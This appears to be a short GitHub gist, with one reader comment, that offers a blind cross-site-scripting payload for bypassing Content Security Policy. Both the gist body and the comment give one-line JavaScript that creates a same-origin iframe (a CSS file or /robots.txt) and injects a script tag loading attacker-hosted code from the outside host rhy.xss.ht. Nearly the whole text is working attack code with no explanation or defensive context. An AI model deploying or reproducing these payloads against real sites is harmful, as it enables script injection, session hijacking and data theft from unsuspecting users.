@Rhynorater
Last active January 3, 2024 07:00
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)

Bo0oM commented Sep 3, 2018

d=document;f=d.createElement("iframe");f.src="/robots.txt";f.onload=_=>f.contentWindow.document.head.append(s);d.body.append(f);s=d.createElement("script");s.src="//rhy.xss.ht"; :)
